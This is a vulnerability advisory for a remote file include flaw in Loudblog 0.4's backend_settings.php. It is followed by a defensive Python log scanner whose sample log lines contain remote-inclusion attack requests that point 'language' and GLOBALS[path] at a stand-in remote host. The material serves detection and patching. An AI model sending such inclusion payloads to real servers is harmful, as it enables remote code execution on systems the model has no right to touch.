VID 21855
Severity 40
Port 80, ...
Protocol TCP
Class CGI
Detailed Description Loudblog contains a remote file include vulnerability in the backend_settings.php script. Loudblog is a Content Management System (CMS), written in PHP, for publishing audio content on the web. Loudblog version 0.4 and earlier versions could allow a remote attacker to include malicious PHP files, because user-supplied input passed to the 'GLOBALS[path]' and 'language' parameters of the 'loudblog/inc/backend_settings.php' script is not properly validated. If PHP's 'register_globals' setting is enabled, a remote attacker can send a specially crafted URL request to execute arbitrary PHP code and operating system commands on the affected host.
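As an added detection example (not from this advisory or the Loudblog project), the script below scans web server access-log lines for requests to backend_settings.php that set GLOBALS[path] at all, or pass a remote resource or stream wrapper as 'language'; the common log format, the inc/backend_settings.php path suffix and the sample addresses are assumptions, and the log lines are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Script and parameters named in the advisory.
TARGET_SCRIPT = "inc/backend_settings.php"
WATCHED_PARAMS = ("GLOBALS[path]", "language")

# A 'language' value naming a resource (scheme://, protocol-relative //, PHP wrapper).
REMOTE_VALUE = re.compile(r"^(?:[a-z][a-z0-9+.-]*:)?//|^(?:php|data|expect|file|ftp|https?):", re.I)

# Common log format (assumed): client, identity, user, timestamp, request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<url>\S+)(?: \S+)?" (?P<status>\d{3})')

def inspect_request(url):
    """Return (param, value) pairs in one request that look like inclusion attempts."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith(TARGET_SCRIPT):
        return []
    hits = []
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name not in WATCHED_PARAMS:
            continue
        for value in values:
            # A client has no business setting GLOBALS[...]: any value is a
            # register_globals poisoning attempt. 'language' is a legitimate
            # parameter, so flag it only when the value points to a resource.
            if name.startswith("GLOBALS[") or REMOTE_VALUE.search(value):
                hits.append((name, value))
    return hits

def scan_log(lines):
    """Run inspect_request over access-log lines; one finding per hit."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for name, value in inspect_request(m["url"]):
            findings.append({"ip": m["ip"], "time": m["ts"], "param": name,
                             "value": value, "status": int(m["status"])})
    return findings

# Constructed sample log lines using documentation addresses, not real traffic.
LOG_LINES = [
    '192.0.2.10 - - [10/Feb/2006:12:00:01 +0000] "GET /loudblog/inc/backend_settings.php?language=de HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Feb/2006:12:00:05 +0000] "GET /loudblog/inc/backend_settings.php?language=http://203.0.113.5/x.txt HTTP/1.1" 200 2048',
    '198.51.100.7 - - [10/Feb/2006:12:00:09 +0000] "GET /loudblog/inc/backend_settings.php?GLOBALS%5Bpath%5D=http%3A%2F%2F203.0.113.5%2Fx.txt HTTP/1.1" 200 2048',
    '192.0.2.11 - - [10/Feb/2006:12:01:00 +0000] "GET /loudblog/index.php?language=http://203.0.113.5/x.txt HTTP/1.1" 200 900',
]
```

Only the two requests to backend_settings.php that carry GLOBALS[path] or a URL in 'language' are reported; the plain 'language=de' request and the hit on a different script are not.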

* References:
http://www.securityfocus.com/archive/1/423947/30/0/threaded
http://retrogod.altervista.org/loudblog_04_incl_xpl.html
http://loudblog.de/forum/viewtopic.php?id=576
http://secunia.com/advisories/18722/
http://www.frsirt.com/english/advisories/2006/0441

* Platforms Affected:
Loudblog version 0.4 and earlier versions
Any operating system, any version
Recommendation Upgrade to the latest version of Loudblog (0.41 or later), available from the Loudblog Download Web site at http://loudblog.de/index.php?s=download
Related URL CVE-2006-0565 (CVE)
Related URL 16495 (SecurityFocus)
Related URL 24479 (ISS)